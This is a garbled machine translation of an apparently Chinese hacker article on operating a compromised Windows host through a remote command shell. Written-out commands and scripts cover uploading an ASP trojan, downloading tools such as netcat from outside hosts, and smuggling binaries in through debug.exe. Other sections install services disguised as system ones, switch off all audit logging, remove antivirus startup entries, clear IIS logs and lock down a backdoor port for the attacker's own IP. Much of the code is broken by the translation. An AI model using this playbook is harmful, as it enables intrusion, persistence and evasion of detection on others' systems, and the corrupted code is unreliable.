佚名MYHACK58:62200923303Do All in Cmd Shell-vulnerability warning-the black bar safety net
Foreword
Cmd Shell(command line interaction)is a hack eternal topic, it is the historic and enduring it.
This article is intended to introduce and summarize some of the command line under control of Windows systems. These methods are as far as possible use the system comes with the tools to achieve.
File transfer
For overflow vulnerability to get the cmd shell, the biggest problem is how to upload a file. Due to a worm epidemic, connected to the ipc$of the desired 1 3 9 or 4 4 5 port is routed to the embargo. Plus WinXP system to strengthen for the ipc$of the protection by ipc$and default share the uploaded file means the basic invalid. ftp and tftp are two possible methods, between which has been well-known, this article is not introduced. There are three kinds of familiar way, as a summary I’ll mention it:
1, with the Echo command to write the ASP Trojan.
Provided of course that the target host is already installed on IIS.
Generally the ASP Trojan"volume"is large, not suitable for the direct use of the echo command written to the file, here I offer a small.
Given directly to the echo:
@echo ^< %with the server. createobject(“adodb. stream”):. type=1:. open:. the write request. binaryread(request. totalbytes):. savetofile server. mappath(request. querystring(“s”)),2:end with%^> >up. asp
Note that only a single line, without a carriage return.
Generation of up. asp can’t use a browser to access, can only use the following script:
with wscript
if . arguments. count<3 then . quit
url=. arguments(0)&“? s=”& amp;. arguments(2)
fn=. arguments(1)
end with
with createobject(“adodb. stream”)
. type=1:. open:. loadfromfile fn:s=. read:. close
end with
with createobject(“microsoft. xmlhttp”)
. open “post”,url,false:. send s
wscript. echo . statustext
end with
Save it as up. vbs. Assuming that the target IP 1 2 3. 4 5. 6 7. 8 9, up. asp in the IIS virtual root directory, 需要上传的文件为nc.exe that 上传 后 保存 为 mm.exe, the corresponding command is:
cscript up. vbs <http://123.45.67.89/up.asp> nc.exe mm.exe
Note that this command is in the local command line to perform, make no mistake about it.
In addition, through the IIS upload will stay the log, remember to clear Oh.
2, The automatic download to the page cache.
For example:
start its:<http://www.sometips.com/soft/ps.exe>
In the remote shell executing the above command, ps. exe has been downloaded to the target host page cache directory. Then:
cd “C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content. IE5”
dir /s ps[1]. exe
So get ps. exe a specific location(each host is different), such as:
C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content. IE5\AB094JIT directory
2004-01-24 1 4:2 4 49,152 ps[1]. exe
1 File 49,152 bytes
Finally:
copy AB094JIT\ps[1]. exe c:\path\ps.exe
del AB094JIT\ps[1]. exe
Additional information:
In order for the service to start the way to the back door of the shell, which the user identity is generally System. At this time the web cache directory location as the example shown in Fig. If the shell’s identity is not a System, need to modify the Default User for the corresponding user name.
This method will start an IE process, remember to it will be killed. If it is a System The identity of the shell, not in the local appears the window is exposed.
In addition, with the ms-its instead its effect is exactly the same.
3, Echo a script to download web resources.
Ready-made tool is iGet. vbs. I then give the one containing the necessary fault tolerance of the version.
Is still echo version:
@echo with wscript:if . arguments. count^<2 then . quit:end if > dl. vbs
@echo set aso=. createobject(“adodb. stream”):set web=createobject(“microsoft. xmlhttp”) >> dl. vbs
@echo web. open “get”,. arguments(0),0:web. send:if web. status^>2 0 0 then . echo “Error:”+web. status:. quit >> dl. vbs
@echo aso. type=1:aso. open:aso. write the web. responsebody:aso. savetofile . arguments(1),2:end with >> dl. vbs
Example-download ps. exe and save it to c:\the path under:
cscript dl. vbs <http://www.sometips.com/soft/ps.exe> c:\path\ps.exe
Note that this is in the remote shell execution.
4, the Echo through the encoding of any file, then the script+debug restore.
The previous two approaches are not guaranteed to pass through the firewall. Moreover, unless its own framethe Web server, a General Web resource is a compressed file form. If the target host does not have unzip tool, or no choice。 Then only the"killer"!
the echo command emphasis orientation of the operator can be written in the ASCII code is less than 1 2 8 characters, but greater than or equal to 1 2 8 No. Only the local file re-encoding for the display character can be easily written to the remote host. First of all can think of is to base64-encoded, i.e., email attachment encoding. But the vbs does not support bit operations, so the encoding and decoding is more complex. More trouble is, the script in binary stream mode processing the file capacity is very poor. (ADODB. The Stream may be in stream mode to write the file, but I cannot construct the corresponding data type. The binary data stream can use the midb function is converted to a string, but in turn not. I spent two days, still could not solve this problem. If there is anyone who could use vbs or js write any number of bytes according to the file, kindly enlighten me on.
Helpless only please debug. exe to run. The principle many people know that I’m not introduced, given directly to the outcome-encoded script:
fp=wscript. arguments(0)
fn=right(fp,len(fp)-instrrev(fp,“"))
with createobject(“adodb. stream”)
. type=1:. open:. loadfromfile fp:str=. read:sl=lenb(str)
end with
sll=sl mod 6 5 5 3 6:slh=sl\6 5 5 3 6
with createobject(“scripting. filesystemobject”). opentextfile(fp&”. bat",2,true)
. write “@echo str=”“”
for i=1 to sl
bt=ascb(midb(str,i,1))
if bt<1 6 then . write “0”
. write hex(bt)
if i mod 1 2 8=0 then . write “”“>>debug. vbs"+vbcrlf+“@echo +”“”
next
. writeline “”“>>debug. vbs”+vbcrlf+“@echo with wscript. stdout:r=vbcrlf”
+”:for i=1 to len(str) step 4 of 8: The. write ““e””+hex(2 5 6+(i-1)/2)“_
+”:for j=i to i+4 6 step 2:. write"" “”+mid(str,j,2):next:. write r:next>>debug. vbs"
. writeline “@echo . write ““rbx””+r+”“”+hex(slh)+“”“+r+”“rcx”“+r+”“”+hex(sll)_
+“”“+r+”“n debug. tmp”“+r+”“w”“+r+”“q”“+r:end with”_
+“>>debug. vbs&&cscript //nologo debug. vbs|debug. exe>nul&&ren the debug. tmp “””&fn&“”“&del debug. vbs”
end with
Save it as echo. vbs. 假设 要 上传 nc.exe then in local command line, enter the command:cscript echo. vbs nc.exe
Can also be directly put to transfer the file icon onto the script file icon.
Wait a moment, in the current directory will generate a nc. exe. bat. With Notepad and other editing tools to open it, you can see the following:
@echo str=“4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000”>>debug. vbs
@echo +“504500004C010400B98EAE340000000000000000E0000F010B010500009800000062000000000000004C00000010000000B0000000004000001000000002000004000000000000000400000000000000003001000004000000000000030000000000100000100000000010000010000000000000100000000000000000000000”>>debug. vbs
@echo +“002001003C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A0210100640100000000000000000000000000000000000000000000000000002E74657874000000”>>debug. vbs
@echo +“70970000001000000098000000040000000000000000000000000000200000602E726461746100001704000000B0000000060000009C0000000000000000000000000000400000402E646174610000004452000000C00000003E000000A20000000000000000000000000000400000C02E696461746100005C07000000200100”>>debug. vbs
…
… (Omit the number of rows
…
@echo +“”>>debug. vbs
@echo with wscript. stdout:r=vbcrlf:for i=1 to len(str) step 4 of 8: The. write “e”+hex(2 5 6+(i-1)/2):for j=i to i+4 6 step 2:. write " "+mid(str,j,2):next:. write r:next>>debug. vbs
@echo . write “rbx”+r+“0”+r+“rcx”+r+“E800”+r+“n debug. tmp”+r+“w”+r+“q”+r:end with>>debug. vbs&&cscript //nologo debug. vbs|debug. exe>nul&&ren the debug. tmp “NC.EXE”&del debug. vbs
Full - on copy - on switch to the remote command-line window - on paste.
If the network speed is not very slow, the entire upload process takes about 2 0 seconds.
Some points to note:
1, a large file transfer is unstable, may cause the shell to die off. So file the smaller the better. Recommends that the original file should not exceed 100KB.
2, in the transmission of large files before, you can first transfer a small file as a"warm up", let the 1 6-bit virtual machine ntvdm. exe resides in the background. All the file transfer finished, for concealment purposes, should the ntvdm process killed.
3, some of the cmd shell for each command are required to attach two carriage returns, then nc. exe. bat it can not be directly used.
4, a single command length is limited, it can not use only one echo to complete all tasks. Moreover, for nc provided by the cmd shell, slightly long some of the commands actually causes the shell to automatically exit the overflow. You can modify the"i mod 1 2 8=0"statement in the 1 2 8 in order to adjust each of the echo commands for the length. Each time the echo character for this number is multiplied by 2.
5, the decoding process is not the script involved is also possible. Use the script purpose is to reduce the amount of data transmitted as compressed data. If you have time, I’ll write a more perfect script, Enhanced Data compression capabilities, increased data validation capabilities.
Can upload files of course everything is well organized, but a lot of operations with the Windows built-in Tool more convenient. In everywhere you need to find the tool, do not forget Windows itself.
System configuration
This section includes three aspects of content: the registry, services and Group Policy.
Be the first to say the registry. Many of the command line to access the registry tool are interactive, the overflow generated by the shell generally can not be again redirected input/output stream, so can not be used.
Fortunately, the system comes with regedit. exe sufficient.
1, Read the registry
First want to query the registry key export, and then type view, such as:
C:>regedit /e 1. reg “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp”
C:>type 1. reg | find “PortNumber”
“PortNumber”=dword:00000d3d
C:>del 1. reg
So the Terminal Services port is 3 3 8 9 hexadecimal d3d)
2, Modify/Delete registry entries
The first echo of a reg file, then import, such as:
echo Windows Registry Editor Version 5.00 >1. reg
echo. >>1. reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0] >>1. reg
echo “TelnetPort”=dword:0 0 0 0 0 9 1 3 >>1. reg
echo “NTLM”=dword:0 0 0 0 0 0 0 1 >>1. reg
echo. >>1. reg
regedit /s 1. reg
The telnet Service Port to 2 3 2 3 hexadecimal 9 1 3, the NTLM authentication is 1.
To delete an item, in the name of the front of the plus and minus signs, such as:
[-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Serv-U]
To delete a value, the equal sign followed by a minus sign, such as:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
“KAVRun”=-
3, with the inf file access to the registry
The above to the registry of the three operations, you can also use the following inf file to achieve:
[Version]
Signature=“$WINDOWS NT$”
[DefaultInstall]
AddReg=My_AddReg_Name
DelReg=My_DelReg_Name
[My_AddReg_Name]
HKLM,SOFTWARE\Microsoft\TelnetServer\1.0,TelnetPort,0x00010001,2 3 2 3
HKLM,SOFTWARE\Microsoft\TelnetServer\1.0,NTLM,0x00010001,1
[My_DelReg_Name]
HKLM,SYSTEM\CurrentControlSet\Services\Serv-U
HKLM,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,KAVRun
It will be written to the c:\path\reg. inf and then use the following command"install": the
rundll32.exe setupapi,InstallHinfSection DefaultInstall 1 2 8 c:\path\reg.inf
Some points to note:
1, The[Version]and[DefaultInstall]is a must, AddReg and DelReg must have at least one. My_AddReg_Name and My_DelReg_Name can be customized.
0x00010001 represents a REG_DWORD data type, 0x00000000 or omit the item(keep the comma)indicates a REG_SZ(string). 0x00020000 represents REG_EXPAND_SZ。
2 3 2 3 can also be used 0x913 instead.
About the inf file of the detailed information, you can refer to the DDK Help documentation.
2, The InstallHinfSection is case-sensitive. It and setupapi between only oneA comma, with no spaces.
1 2 8 represents a given path, the parameters of the other values and meanings, see MSDN.
Of particular note, the last parameter must be the inf file full path, not relative path.
3, The inf files in the project are not case sensitive.
Next to persuade the services. If you want to start or stop a service, use the net command can be. But want to add or delete services, the need to use SC, instsrv.exe and xnet. exe and other tools. Without these tools the system comes without(XP and 2 0 0 3 that comes with SC). Import the registry although you can, but the effect is not good, the reason will be mentioned later on. Still have to rely on the inf file to run it.
Add a service:
[Version]
Signature=“$WINDOWS NT$”
[DefaultInstall. Services]
AddService=inetsvr,My_AddService_Name
[My_AddService_Name]
DisplayName=Windows Internet Service
Description=provides on the Internet Information Services Management Support.
ServiceType=0x10
StartType=2
ErrorControl=0
ServiceBinary=%11%\inetsvr.exe
Save for the inetsvr. inf, and then:
rundll32.exe setupapi,InstallHinfSection DefaultInstall 1 2 8 c:\path\inetsvr.inf
This example adds a named inetsvr the service is not very like the system comes with the service, Oh on.
Some points to note:
1, The last four items are
Service type: 0x10 as an independent process services, 0x20 for shared process services such as svchost; and
Startup Type: 0 system boot time loading, 1 OS initialization when loaded, and 2 by the SCM, the Service Control Manager automatically starts, 3 manual start, 4 disabled.
Note that 0 and 1 can only be used for drivers
Error control: 0 to ignore, 1 to continue and warning that 2 To switch to the LastKnownGood settings, 3 blue screen.
Service program location:%1 1% represents the system32 directory%1 0% indicates that the system directory(WINNT or Windows),%1 2 percent to drive the directory system32\drivers and. Other values, see the DDK for. You can also needless to variables directly using the full path.
This fourth item is a must have.
2, In addition to the examples of the six projects, there are LoadOrderGroup And Dependencies, etc. Not commonly used so not introduced.
3, The inetsvr behind the two commas, because the middle is omitted not a commonly used parameter flags.
To delete a service:
[Version]
Signature=“$WINDOWS NT$”
[DefaultInstall. Services]
DelService=inetsvr
Very simple, isn’t it?
Of course, you can also import the registry to achieve the purpose. But the inf has its own advantages.
1, export a the system comes with the service registry entry, you will find that its execution path is like this:
“ImagePath”=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6 d,0 0,5 2,0 0,6 f,0 0,6 f,0 0,\
74,00,25,00,5 c,0 0,7 3,0 0,7 9,0 0,7 3,0 0,7 4,0 0,6 5,0 0,6 d,0 0,3 3,0 0,3 2,0 0,5 c,0 0,7 4,\
00,6 c,0 0,6 e,0 0,7 4,0 0,7 3,0 0,7 6,0 0,7 2,0 0,2 e,0 0,6 5,0 0,7 8,0 0,6 5,0 0,0 0,0 0
The readability is too poor. 其实 它 就是 %SystemRoot%\system32\tlntsvr.exe but the data type is REG_EXPAND_SZ the. When manually importing the registry to increase service, so that the defined ImagePath obviously very inconvenient. If you use REG_SZ instead will be some issues-can’t use environment variables. I.e. only using the full path. With the inf file is completely does not have this problem, ServiceBinary, i.e. the ImagePath automatically become REG_EXPAND_SZ。
2, The most critical is, and with SC and other tools, the inf file of the effect is instant acting, and import the reg after must be restarted to be effective.
3, The inf file will automatically for the service registry entries to add a Security sub-key so that it looks more like the system comes with the service.
In addition, AddService and DelService as well as AddReg And DelReg can be at the same time and repeated use. It can simultaneously adding and deleting multiple services and registry entries. Detailed content please see the DDK for.
Finally talk about the Group Policy. Group Policy is to establish the Windows Security Environment of the important means, especially in a Windows domain environment. A good system administrator should be able to skillfully master and apply the Group Policy. In the window interface to access the Group Policy with gpedit. msc, 命令行下用secedit.exe the.
Look at secedit command syntax:
secedit /analyze
the secedit /configure
secedit /export
secedit /validate
secedit /refreshpolicy
5 command function, respectively, is the analysis of group policies, configuring Group Policy, export Group Policy, verify that the template syntax and update the Group Policy. Wherein the secedit /refreshpolicy on XP/2 0 0 3 The following is gpupdate instead. These command specific syntax of their own at the command line to view to know.
With access to the registry only need the reg file is different, to access the Group Policy in addition to have a template file(or inf), you also need a secure database file(sdb). To modify Group Policy, You must first template into the security database, and then through the application of the safety database to refresh the Group Policy. View an example:
Suppose I want the password minimum length is set to 6, and enable"password must meet complexity requirements", then the first write a template:
[version]
signature=“$CHICAGO$”
[System Access]
MinimumPasswordLength = 6
PasswordComplexity = 1
Save for gp. inf, and then import:
secedit /configure /db gp. sdb /cfg gp. inf /quiet
This command execution is completed, will be in the current directory to generate a gp. sdb, it is the"intermediate product", you can delete it.
the /quiet parameter represents the"quiet mode"that does not produce a log. But according to my test, in 2000sp4 under this parameter does not seem to work, XP is normal. The log is always saved in the%windir%\security\logs\scesrv. log. You can also specify their own logs in order to subsequently remove it. For example:
secedit /configure /db gp. sdb /cfg gp. inf /log gp. log
del gp.*
In addition, in the import template before, you can first parse method is correct:
secedit /validate the gp. inf
How, then, to know the specific syntax? Of course to the MSDN to find. There is also the lazy way, because the system comes with some security templates in the%windir%\security\templates directory. Open the template basically contains commonly used security settings syntax, one can understand.
Another example–turn off all of the audit policy. Which the audit event is logged in Event Viewer"security".
echo version:
echo [version] >1. inf
echo signature=“$CHICAGO$” >>1. inf
echo [Event Audit] >>1. inf
echo AuditSystemEvents=0 >>1. inf
echo AuditObjectAccess=0 >>1. inf
echo AuditPrivilegeUse=0 >>1. inf
echo AuditPolicyChange=0 >>1. inf
echo AuditAccountManage=0 >>1. inf
echo AuditProcessTracking=0 >>1. inf
echo AuditDSAccess=0 >>1. inf
echo AuditAccountLogon=0 >>1. inf
echo AuditLogonEvents=0 >>1. inf
secedit /configure /db 1. sdb /cfg 1. inf /log 1. log /quiet
del 1.*
Perhaps someone will say: the Group Policy is not stored in the registry? why not directly modify the registry? Because not all of the Group Policy are saved in the registry. Such as the"audit policy"is not. You can use regsnap to compare the modification of the policy before and after registry changes. My test result is nothing changed. Only the"management template"this section is based entirely on the registry. Moreover, know the specific location, with which the methods are not complicated.
For example, XP and 2 0 0 3 The"Local Policies"-on"Security Options"Add a"local account sharing and security model"strategy. XP the default setting is"guest only"to. This is why using the administrator account to connect XP to the ipc$is still the only Guest permissions reasons. You can import the reg file modify it to"classic": the
echo Windows Registry Editor Version 5.00 >1. reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] >>1. reg
echo “forceguest”=dword:0 0 0 0 0 0 0 0 >>1. regregedit /s 1. reg
del 1. reg
While corresponding with inf, it should be:
echo [version] >1. inf
echo signature=“$CHICAGO$” >>1. inf
echo [Registry Values] >>1. inf
echo MACHINE\System\CurrentControlSet\Control\Lsa\ForceGuest=4,0 >>1. inf
secedit /configure /db 1. sdb /cfg 1. inf /log 1. log
del 1.*
On the command line to read the Group Policy problem.
The system default security database is located in%windir%\security\database\secedit. sdb, export it to the inf file:
secedit /export /cfg gp. inf /log 1. log
Not with the/db parameter specifies the database is to use the default. And then see the gp. inf.
However, this get just part of the Group Policy, which is the"Windows Settings"in. Moreover, a policy if not configured, will not be exported. For example, the"Rename administrator account", only to be defined only in the inf file appears in the NewAdministratorName=“xxx”. For cannot be exported to other Group Policy only by accessing the registry to obtain.
This way in XP and 2 0 0 3 The following invalid-can export but the content is substantially empty. For unknown reasons. According to the official information, the XP and 2 0 0 3 to display the Group Policy with RSoP Group Policy Results set. The corresponding command line tool is gpresult on. However, it is when the system starts to be attached from the domain’s Group Policy, A single test result is still"empty". So, if you want to know for certain whether Group Policy is set, only the first to write an inf, then use the secedit /analyze, then view the log.
Network configuration
Windows built on a network of command-line tools are many, such as the familiar ping,tracert,ipconfig,telnet,ftp,tftp,netstat, there are not too familiar with nbtstat,pathping,nslookup,finger,route,netsh…
These commands can be divided into three categories: network testing such as ping, a network connection such as telnet and network configuration such as netsh is. The previous two relatively simple, this article only describes the two network configuration tools.
netsh
In the remote shell, use the netsh first to solve an interaction problem. As mentioned above, many of the shell can again redirect the output of the output, so we can not in this environment interactively use ftp and other command-line tools. The solution is, in General an interactive tool to allow the use of scripts or response files. Such as ftp-s:filename. netsh is also this: netsh-f filename.
the netsh command is very large, you can configure IAS, DHCP, RAS, WINS, NAT server, the TCP/IP Protocol, IPX Protocol, routing, etc. We are not a administrator, is generally not necessary to understand so much, just use netsh to understand the target host’s network configuration information.
1, TCP/IP configuration
echo interface ip >s
echo show config >>s
netsh-f s
del s
Thus you can understand the host has multiple network cards and IP, whether it is a dynamically assigned IP(DHCP), the network IP is how much, if any.
This command and the ipconfig /all almost.
Note that the following command requires the target host to start the remoteaccess service. If it is disabled, please start by importing the registry, the lifting of the ban, and then
net start remoteaccess
2, ARP
echo interface ip >s
echo show ipnet >>s
netsh-f s
del s
This than the arp-a command a little more information.
3, TCP/UDP connections
echo interface ip >s
echo show tcpconn >>s
echo show udpconn >>s
netsh-f s
del s
This group of command and netstat-an.
4, The card information
If the netsh command there are other command can be replaced, and that it also what there is necessary? Below this you find instead.
echo interface ip >s
echo show interface >>s
netsh-f s
del s
netsh other functions, such as modifying the IP, is generally not necessary to use in case of changed IP later on,“called day should not call to the dead”, so all of the skipped.
IPSec
First, it should be noted that IPSec and TCP/IP filtering is something different, we don’t get confused. TCP/IP filtering function is very limited, far less IPSec flexible and powerful. The following will talk about how on the command line under the control of IPSec.
XP use ipseccmd, the 2 0 0 0 with ipsecpol from. Unfortunately, they are not the system comes with. ipseccmd in the xp system install disk in the SUPPORT\TOOLS\SUPPORT. CAB, ipsecpol in 2 0 0 0 Resource Kit. Moreover, you want to use ipsecpol must also bring two additional documents: ipsecutil.dll和text2pol.dll the. Three files, a total of 119KB of.
IPSec via Group Policy to control, but I searched the MSDN, but could not find the corresponding security template syntax. Have configured the IPSec policy can not be exported as a template. So, Group Policy is the road to nowhere. IPSec settings are saved in the registry(HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local), in theory you can modify the registry to configure IPSec. But a lot of information in binary form is stored, reads and modifications are very difficult. In contrast, the upload command-line tool more convenient.
On the ipsecpol and ipseccmd information can be found online a lot, so this article will not elaborate, just include some practical examples.
In the set IPSec policy aspect, the ipseccmd command syntax and ipsecpol almost exactly the same, so just to ipsecpol, for example:
1, Defense the rpc-dcom attack
ipsecpol-p myfirewall-r rpc-dcom-f *+0:1 3 5:tcp *+0:1 3 5:udp *+0:1 3 7:udp *+0:1 3 8:udp *+0:1 3 9:tcp *+0:4 4 5:tcp *+0:4 4 5:udp-n BLOCK-w reg-x
This command closes the local host TCP135,1 3 9,4 4 5 and udp135,1 3 7,1 3 8,4 4 5 port.
Specific meaning is as follows:
-p myfirewall specify the policy name myfirewall
-r rpc-dcom specified rules called rpc-dcom
-f… The establishment of 7 filters.* Represents any address(source); 0 indicates the address of the machine(target);+indicates mirroring(bi-directional)filter. Detailed syntax see ipsecpol -?
-n BLOCK specify a filter operation is"blocking"it. Note that the BLOCK must be uppercase.
-w reg will be configured to write to the registry, and after the restart is still valid.
-x immediately activate the policy.
2, to prevent the ping
ipsecpol-p myfirewall-r antiping-f *+0::icmp-n BLOCK-w reg-x
If the name myfirewall the policy already exists, it antiping rules will be added to them.
Note that the rule also prevents the host to ping someone else.
3, back door for IP restrictions
Assuming you are in a certain host is installed on the DameWare Mini Remote Control is. In order to protect it from others storm breaking a password or overflow, should be limited to its service Port 6 1 2 9 access.
ipsecpol-p-myfw-r dwmrc_block_all-f *+0:6 1 2 9:tcp-n BLOCK-w reg
ipsecpol-p-myfw-r dwmrc_pass_me-f 123.45.67.89+0:6 1 2 9:tcp-n PASS-w reg-x
This will only 1 2 3. 4 5. 6 7. 8 9 can access the host 6 1 2 9 port.
If you are a dynamic IP, it should be based on the IP assigned in the range set the rules. For example:
ipsecpol-p-myfw-r dwmrc_block_all-f +0:6 1 2 9:tcp-n BLOCK-w reg
ipsecpol-p-myfw-r dwmrc_pass_me-f 123.45.67.+ 0:6 1 2 9:tcp-n PASS-w reg-x
This allows the 1 2 3. 4 5. 6 7. 1 to 1 2 3. 4 5. 6 7. 2 5 4 IP access 6 1 2 9 port.
In the written rules, should be particularly careful not to put yourself blocked. If you’re unsure of a rule whether the effect and expected the same, you can start with planning a task"left posterior"in. For example:
c:>net start schedule
Task Scheduler service is starting …
The Task Scheduler service has started successfully.
c:>time /t
1 2:3 4
c:>at 1 2:3 9 ipsecpol-p-myfw-y-w reg
The new addition of a job, its job ID = 1
Then, you have 5 minutes to set one myfw policy and test it out. After 5 minutes, the scheduled task will stopThe policy.
If the test result is not ideal, is to delete the policy.
c:>ipsecpol-p-myfw-o-w reg
Note that the deletion policy before you must first ensure that it has stopped. Don’t stop it, even if you delete will also be in a period of time to continue in force. The duration depends on the policy of the Refresh time, default is 1 8 0 minutes.
If the test passes, then enable it.
c:>ipsecpol-p-myfw-x-w reg
The last way to view IPSec policy approaches.
For XP is very simple, one command to get-the ipseccmd show filters
And ipsecpol is no query function. Need to use a command-line tool netdiag on. It is located in 2 0 0 0 system install disk in the SUPPORT\TOOLS\SUPPORT. CAB. Already uploaded the three files, also don’t care one more.^_^)
netdiag requires RemoteRegistry service support. So first start the service:
net start remoteregistry
Do not start RemoteRegistry will get an error:
[FATAL] Failed to get system information of this machine.
netdiag this tool function is very powerful, network-related information can be acquired! However, the output of information is sometimes too detailed, more than the command line console cmd. exe the output cache, rather than each remote cmd shell can use the more command to paginate.
View ipsec policy command is:
netdiag /debug /test:ipsec
Then is a long string of output information. IPSec policy is located in the last.
Software installation
A software/tool of the installation process, and in General just do two things: copy the file to a specific directory and modify the registry. As long as clear the specific content, then you can own at the command line. Regardless of the installation after the required registration activation, etc.
WinPcap is a very commonly used tool, but it must be in a window screen installation. Online can also be found without a GUI version, but still has a colophon, and in fact, we can totally do it yourself one.
To WinPcap 3.0 a, for example. By comparing before and after installation of the file system and registry snapshot, it is easy to understand the entire installation process.
Remove the anti-mounted part, the key documents are three: wpcap.dll that packet.dll 和 npf.sys the. The previous two files are located in the system32 directory, and the third one in system32\drivers. While the registry of the changes is to increase a system service NPF. Note that is a system service that is Drive is not a Win32 service.
As a system service, not only in the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services Add a primary key, in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root under the also increase the primary key. The latter default only the SYSTEM status can only be modified. Fortunately, it does not need to manually add it, winpcap is invoked automatically when done. Or even completely without manually modifying the registry, all of the things that winpcap will yourself to finish, you only need the three files copied to the appropriate location on the line.
As an example, or show you how to modify the registry: using said in front of the inf file to achieve.
[Version]
Signature=“$WINDOWS NT$”
[DefaultInstall. Services]
AddService=NPF,winpcap_svr
[winpcap_svr]
DisplayName=Netgroup Packet Filter
ServiceType=0x1
StartType=3
ErrorControl=1
ServiceBinary=%12%\npf.sys
The above content is saved as wpcap. the inf file.
Then write a batch wpcap. bat: the
rundll32.exe setupapi,InstallHinfSection DefaultInstall 1 2 8% CD%\wpcap. inf
del wpcap. inf
if /i %CD%==%SYSTEMROOT%\system32 goto COPYDRV
copy packet.dll %SYSTEMROOT%\system32\
copy wpcap.dll %SYSTEMROOT%\system32\
del packet.dll
del wpcap.dll
:COPYDRV
if /i %CD%==%SYSTEMROOT%\system32\drivers goto END
copy npf.sys %SYSTEMROOT%\system32\drivers\
del npf.sys
:END
del %0
Then use winrar all the files(5)packaged as self-extracting exe, and the"advanced SFX options"->"unzip run"is set to wpcap. bat, the command line of the winpcap installation package.
Note that the batch last line without a carriage return. Otherwise it will because the running and unable to delete yourself.
All of the software installed, you can basically apply this idea. But there are exceptions, that is, the system patch installation.
Due to a system patch is likely to be replaced are to be executed or access the file, so use the copy command does not work.
Fortunately, the Windows patch support command line installation.
For example:
KB824146.exe -n-z-q
-n do not retain a backup
-z do not restart
-q quiet mode
If there is a bunch of patches to play, then use the RAR package into a self extracting file, plus a batch.
for %%f in (KB???.exe) do %%f-n-z-q
for %%f in (KB???.exe) do del %%f
del %0
Windows Script
A lot of things with the script to do is very simple. Given below are few commonly used script echo version.
1, The display system version
@echo for each ps in getobject _ >ps. vbs
@echo (“winmgmts:\\.\ root\cimv2:win32_operatingsystem”). instances_ >>ps. vbs
@echo wscript. echo ps. caption^&" "^&ps. version:next >>ps. vbs
cscript //nologo ps. vbs & del ps. vbs
2, the enumeration process
@echo for each ps in getobject _ >ps. vbs
@echo (“winmgmts:\\.\ root\cimv2:win32_process”). instances_ >>ps. vbs
@echo wscript. echo ps. handle^&vbtab^&ps. name^&vbtab^&ps. executablepath:next >>ps. vbs
cscript //nologo ps. vbs & del ps. vbs
3, the termination process
@echo for each ps in getobject _ >pk. vbs
@echo (“winmgmts:\\.\ root\cimv2:win32_process”). instances_ >>pk. vbs
@echo if ps. handle=wscript. arguments(0) then wscript. echo ps. terminate:end if:next >>pk. vbs
To terminate the PID for the 1 2 3 process, using the following syntax:
cscript pk. vbs 1 2 3
If it shows a 0, indicating the termination of the successful.
Then:
del pk. vbs
4, restart the system
@echo for each os in getobject _ >rb. vbs
@echo (“winmgmts:{(shutdown)}!\\.\ root\cimv2:win32_operatingsystem”). instances_ >>rb. vbs
@echo os. win32shutdown(2):next >>rb. vbs & cscript //nologo rb. vbs & del rb. vbs
5, listed since the start of the service
@echo for each sc in getobject(“winmgmts:\\.\ root\cimv2:win32_service”). instances_ >sc. vbs
@echo if sc. startmode=“Auto” then wscript. echo sc. name^&" - "^&sc. pathname >>sc. vbs
@echo next >>sc. vbs & cscript //nologo sc. vbs & del sc. vbs
6, include a running service
@echo for each sc in getobject(“winmgmts:\\.\ root\cimv2:win32_service”). instances_ >sc. vbs
@echo if sc. state=“Running” then wscript. echo sc. name^&" - "^&sc. pathname >>sc. vbs
@echo next >>sc. vbs & cscript //nologo sc. vbs & del sc. vbs
7, The display system last boot time
@echo for each os in getobject _ >bt. vbs
@echo (“winmgmts:\\.\ root\cimv2:win32_operatingsystem”). instances_ >>bt. vbs
@echo wscript. echo os. lastbootuptime:next >>bt. vbs & cscript //nologo bt. vbs & del bt. vbs
Display the format of the results is:
yyyymmddHHMMSSxxxxxxZZZZ
_ Year _ month, day, hour _ microsecond _ time zone
8, The display system uptime
@echo for each os in getobject _ >rt. vbs
@echo (“winmgmts:\\.\ root\cimv2:win32_perfrawdata_perfos_system”). instances_ >>rt. vbs
@echo s=os. timestamp_sys100ns:l=len(s):s=left(s,l-7):for i=1 to l-7 >>rt. vbs
@echo t=t^&mid(s,i,1):d=t\8 6 4 0 0:r=r^&d:t=t mod 8 6 4 0 0:next >>rt. vbs
@echo wscript. echo cint®^&"d "^&t\3 6 0 0^&"h "^&t\6 0 mod 6 0^&"m "^&t mod 6 0^&“s”:next >>rt. vbs
cscript //nologo rt. vbs & del rt. vbs
This uptime is from a performance counter to get the 6 4-bit integer number, it does not appear in 4 9. 7 days after the overflow situation.